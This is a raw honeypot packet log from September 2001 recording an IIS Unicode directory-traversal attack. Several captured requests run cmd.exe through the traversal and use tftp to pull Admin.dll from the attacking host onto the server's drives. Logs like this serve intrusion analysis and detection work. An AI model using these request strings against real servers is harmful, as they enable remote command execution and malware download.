#(2 - 25198) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=55040 flags=0 offset=0 TTL=128 chksum=29334
TCP: port=80 -> dport: 3888 flags=***A**S* seq=287934
ack=461005599 off=6 res=0 win=8760 urp=0 chksum=53709
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25199) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=26772 flags=0 offset=0 TTL=118 chksum=11015
TCP: port=3785 -> dport: 80 flags=*****R** seq=461004526
ack=461004526 off=5 res=0 win=0 urp=0 chksum=64193
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25200) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=30868 flags=0 offset=0 TTL=119 chksum=55814
TCP: port=3888 -> dport: 80 flags=***A**** seq=461005599
ack=287935 off=5 res=0 win=8760 urp=0 chksum=59786
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25201) [2001-09-18 10:17:15] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=136 ID=31124 flags=0 offset=0 TTL=119 chksum=55462
TCP: port=3888 -> dport: 80 flags=***AP*** seq=461005599
ack=287935 off=5 res=0 win=8760 urp=0 chksum=41120
Payload: length = 94
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48 ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A ction: close..
----------------------------------------------------------------------------
--
#(2 - 25202) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=56064 flags=0 offset=0 TTL=128 chksum=28314
TCP: port=80 -> dport: 3888 flags=***A**** seq=287935
ack=461005695 off=5 res=0 win=8664 urp=0 chksum=59786
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25203) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=231 ID=56320 flags=0 offset=0 TTL=128 chksum=27867
TCP: port=80 -> dport: 3888 flags=***AP*** seq=287935
ack=461005695 off=5 res=0 win=8664 urp=0 chksum=38356
Payload: length = 191
000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30 : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 30 3A 35 36 20 47 4D 54 0D 01 16:00:56 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74 pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20 -stream..Volume
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65 o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69 Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25204) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=260 ID=56576 flags=0 offset=0 TTL=128 chksum=27582
TCP: port=80 -> dport: 3888 flags=***AP**F seq=288126
ack=461005695 off=5 res=0 win=8664 urp=0 chksum=38130
Payload: length = 220
000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30 ....09/18/01 10
030 : 3A 35 33 61 20 20 20 20 20 20 20 20 3C 44 49 52 :53a <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39 > ...09
050 : 2F 31 38 2F 30 31 20 20 31 30 3A 35 33 61 20 20 /18/01 10:53a
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20 <DIR>
070 : 20 20 20 20 20 2E 2E 0D 0A 20 20 20 20 20 20 20 ....
080 : 20 20 20 20 20 20 20 20 32 20 46 69 6C 65 28 73 2 File(s
090 : 29 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30 ) 0
0a0 : 20 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 bytes..
0b0 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0c0 : 20 20 32 2C 31 30 31 2C 30 32 32 2C 32 30 38 20 2,101,022,208
0d0 : 62 79 74 65 73 20 66 72 65 65 0D 0A bytes free..
----------------------------------------------------------------------------
--
#(2 - 25205) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=40084 flags=0 offset=0 TTL=118 chksum=46854
TCP: port=3888 -> dport: 80 flags=*****R** seq=461005695
ack=0 off=5 res=0 win=0 urp=0 chksum=28722
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25206) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=40340 flags=0 offset=0 TTL=118 chksum=46594
TCP: port=3905 -> dport: 80 flags=******S* seq=461005740
ack=0 off=6 res=0 win=8192 urp=0 chksum=14394
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25207) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=56832 flags=0 offset=0 TTL=128 chksum=27542
TCP: port=80 -> dport: 3905 flags=***A**S* seq=288344
ack=461005741 off=6 res=0 win=8760 urp=0 chksum=53140
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25208) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=40596 flags=0 offset=0 TTL=118 chksum=62726
TCP: port=3888 -> dport: 80 flags=*****R** seq=461005695
ack=461005695 off=5 res=0 win=0 urp=0 chksum=61752
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25209) [2001-09-18 10:17:15] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=43924 flags=0 offset=0 TTL=119 chksum=42758
TCP: port=3905 -> dport: 80 flags=***A**** seq=461005741
ack=288345 off=5 res=0 win=8760 urp=0 chksum=59217
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25210) [2001-09-18 10:17:15] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=191 ID=44180 flags=0 offset=0 TTL=119 chksum=42351
TCP: port=3905 -> dport: 80 flags=***AP*** seq=461005741
ack=288345 off=5 res=0 win=8760 urp=0 chksum=246
Payload: length = 139
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll c:\Admin.dll
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio
----------------------------------------------------------------------------
--
#(2 - 25211) [2001-09-18 10:17:15] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=57344 flags=0 offset=0 TTL=128 chksum=27034
TCP: port=80 -> dport: 3905 flags=***A**** seq=288345
ack=461005892 off=5 res=0 win=8609 urp=0 chksum=59217
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25214) [2001-09-18 10:17:17] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=6038 flags=0 offset=0 TTL=118 chksum=31749
TCP: port=3585 -> dport: 80 flags=*****R** seq=461002562
ack=461002562 off=5 res=0 win=0 urp=0 chksum=2786
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25227) [2001-09-18 10:18:29] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=59649 flags=0 offset=0 TTL=128 chksum=24374
TCP: port=80 -> dport: 3905 flags=***AP*** seq=288345
ack=461005892 off=5 res=0 win=8609 urp=0 chksum=33293
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 32 3A 30 39 20 47 4D 54 0D 0A 43 6F 6E 74 :02:09 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25228) [2001-09-18 10:18:29] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=59905 flags=0 offset=0 TTL=128 chksum=24473
TCP: port=80 -> dport: 3905 flags=***A***F seq=288700
ack=461005892 off=5 res=0 win=8609 urp=0 chksum=58861
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25229) [2001-09-18 10:18:29] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=43478 flags=0 offset=0 TTL=118 chksum=43460
TCP: port=3905 -> dport: 80 flags=*****R** seq=461005892
ack=0 off=5 res=0 win=0 urp=0 chksum=28508
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25230) [2001-09-18 10:18:29] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=43734 flags=0 offset=0 TTL=118 chksum=43200
TCP: port=2710 -> dport: 80 flags=******S* seq=467601707
ack=0 off=6 res=0 win=8192 urp=0 chksum=38657
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25231) [2001-09-18 10:18:29] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=60929 flags=0 offset=0 TTL=128 chksum=23445
TCP: port=80 -> dport: 2710 flags=***A**S* seq=362501
ack=467601708 off=6 res=0 win=8760 urp=0 chksum=3246
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25232) [2001-09-18 10:18:29] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=43990 flags=0 offset=0 TTL=118 chksum=59332
TCP: port=3905 -> dport: 80 flags=*****R** seq=461005892
ack=461005892 off=5 res=0 win=0 urp=0 chksum=61341
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25233) [2001-09-18 10:18:30] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=41431 flags=0 offset=0 TTL=119 chksum=45251
TCP: port=2710 -> dport: 80 flags=***A**** seq=467601708
ack=362502 off=5 res=0 win=8760 urp=0 chksum=9323
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25234) [2001-09-18 10:18:30] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=191 ID=41687 flags=0 offset=0 TTL=119 chksum=44844
TCP: port=2710 -> dport: 80 flags=***AP*** seq=467601708
ack=362502 off=5 res=0 win=8760 urp=0 chksum=15886
Payload: length = 139
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll d:\Admin.dll
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio
----------------------------------------------------------------------------
--
#(2 - 25235) [2001-09-18 10:18:30] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=61441 flags=0 offset=0 TTL=128 chksum=22937
TCP: port=80 -> dport: 2710 flags=***A**** seq=362502
ack=467601859 off=5 res=0 win=8609 urp=0 chksum=9323
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25236) [2001-09-18 10:19:31] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=62978 flags=0 offset=0 TTL=128 chksum=21045
TCP: port=80 -> dport: 2710 flags=***AP*** seq=362502
ack=467601859 off=5 res=0 win=8609 urp=0 chksum=48429
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 33 3A 31 32 20 47 4D 54 0D 0A 43 6F 6E 74 :03:12 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25237) [2001-09-18 10:19:31] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=63234 flags=0 offset=0 TTL=128 chksum=21144
TCP: port=80 -> dport: 2710 flags=***A***F seq=362857
ack=467601859 off=5 res=0 win=8609 urp=0 chksum=8967
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25238) [2001-09-18 10:19:31] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=38410 flags=0 offset=0 TTL=118 chksum=48528
TCP: port=2710 -> dport: 80 flags=*****R** seq=467601859
ack=0 off=5 res=0 win=0 urp=0 chksum=52771
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25239) [2001-09-18 10:19:31] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=38666 flags=0 offset=0 TTL=118 chksum=48268
TCP: port=4497 -> dport: 80 flags=******S* seq=473163564
ack=0 off=6 res=0 win=8192 urp=0 chksum=45488
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25240) [2001-09-18 10:19:31] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=64002 flags=0 offset=0 TTL=128 chksum=20372
TCP: port=80 -> dport: 4497 flags=***A**S* seq=424219
ack=473163565 off=6 res=0 win=8760 urp=0 chksum=13894
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25241) [2001-09-18 10:19:31] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=38922 flags=0 offset=0 TTL=118 chksum=64400
TCP: port=2710 -> dport: 80 flags=*****R** seq=467601859
ack=467601859 off=5 res=0 win=0 urp=0 chksum=43137
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25242) [2001-09-18 10:19:31] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=42250 flags=0 offset=0 TTL=119 chksum=44432
TCP: port=4497 -> dport: 80 flags=***A**** seq=473163565
ack=424220 off=5 res=0 win=8760 urp=0 chksum=19971
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25243) [2001-09-18 10:19:31] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=191 ID=42506 flags=0 offset=0 TTL=119 chksum=44025
TCP: port=4497 -> dport: 80 flags=***AP*** seq=473163565
ack=424220 off=5 res=0 win=8760 urp=0 chksum=26533
Payload: length = 139
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll e:\Admin.dll
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio
----------------------------------------------------------------------------
--
#(2 - 25244) [2001-09-18 10:19:31] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=64514 flags=0 offset=0 TTL=128 chksum=19864
TCP: port=80 -> dport: 4497 flags=***A**** seq=424220
ack=473163716 off=5 res=0 win=8609 urp=0 chksum=19971
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25379) [2001-09-18 10:20:33] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=22020 flags=0 offset=0 TTL=128 chksum=62003
TCP: port=80 -> dport: 4497 flags=***AP*** seq=424220
ack=473163716 off=5 res=0 win=8609 urp=0 chksum=58819
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 34 3A 31 34 20 47 4D 54 0D 0A 43 6F 6E 74 :04:14 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25380) [2001-09-18 10:20:33] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=22276 flags=0 offset=0 TTL=128 chksum=62102
TCP: port=80 -> dport: 4497 flags=***A***F seq=424575
ack=473163716 off=5 res=0 win=8609 urp=0 chksum=19615
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25381) [2001-09-18 10:20:33] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=34110 flags=0 offset=0 TTL=118 chksum=52828
TCP: port=4497 -> dport: 80 flags=*****R** seq=473163716
ack=0 off=5 res=0 win=0 urp=0 chksum=59602
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25382) [2001-09-18 10:20:33] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=44 ID=34366 flags=0 offset=0 TTL=118 chksum=52568
TCP: port=2154 -> dport: 80 flags=******S* seq=478595545
ack=0 off=6 res=0 win=8192 urp=0 chksum=55255
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25383) [2001-09-18 10:20:33] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=23556 flags=0 offset=0 TTL=128 chksum=60818
TCP: port=80 -> dport: 2154 flags=***A**S* seq=486299
ack=478595546 off=6 res=0 win=8760 urp=0 chksum=27116
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25384) [2001-09-18 10:20:33] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=34622 flags=0 offset=0 TTL=118 chksum=3165
TCP: port=4497 -> dport: 80 flags=*****R** seq=473163716
ack=473163716 off=5 res=0 win=0 urp=0 chksum=58586
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25385) [2001-09-18 10:20:33] Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=40 ID=41790 flags=0 offset=0 TTL=119 chksum=44892
TCP: port=2154 -> dport: 80 flags=***A**** seq=478595546
ack=486300 off=5 res=0 win=8760 urp=0 chksum=33193
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25386) [2001-09-18 10:20:33] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
hlen=5 TOS=0 dlen=116 ID=42046 flags=0 offset=0 TTL=119 chksum=44560
TCP: port=2154 -> dport: 80 flags=***AP*** seq=478595546
ack=486300 off=5 res=0 win=8760 urp=0 chksum=47995
Payload: length = 74
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 6C 5c../Admin.dll l
020 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host:
030 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F www..Connnectio
040 : 6E 3A 20 63 6C 6F 73 65 0D 0A n: close..
----------------------------------------------------------------------------
--
#(2 - 25387) [2001-09-18 10:20:34] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=25092 flags=0 offset=0 TTL=128 chksum=59286
TCP: port=80 -> dport: 2154 flags=***A**** seq=486300
ack=478595622 off=5 res=0 win=8684 urp=0 chksum=33193
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25388) [2001-09-18 10:20:34] Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
hlen=5 TOS=0 dlen=279 ID=26116 flags=0 offset=0 TTL=128 chksum=58023
TCP: port=80 -> dport: 2154 flags=***AP*** seq=486300
ack=478595622 off=5 res=0 win=8684 urp=0 chksum=19230
Payload: length = 239
